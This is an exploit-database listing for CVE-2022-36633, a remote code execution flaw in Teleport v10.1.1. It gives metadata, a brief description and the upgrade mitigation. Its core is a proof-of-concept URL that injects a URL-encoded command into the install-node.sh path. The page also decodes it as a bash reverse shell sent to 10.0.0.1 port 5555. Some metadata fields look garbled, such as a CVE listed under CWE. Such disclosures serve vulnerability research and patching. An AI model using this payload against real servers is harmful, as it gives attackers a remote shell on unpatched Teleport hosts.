header-logo
Suggest Exploit
vendor:
Teleport
by:
Brandon Roach & Brian Landrum
8.8
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: Teleport
Affected Version From: < 10.1.2
Affected Version To: 10.1.2001
Patch Exists: YES
Related CWE: CVE-2022-36633
CPE: a:gravitational:teleport
Metasploit:
Other Scripts:
Platforms Tested: Linux
2022

Teleport v10.1.1 – Remote Code Execution (RCE)

A vulnerability in Teleport v10.1.1 allows an attacker to execute arbitrary code on the target system by sending a malicious payload to the vulnerable server. The payload is decoded to a bash command which is then executed on the target system.

Mitigation:

Upgrade to Teleport v10.1.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633

Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
method=3Diam


Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Navigation

Suggest Exploit

Services By CQR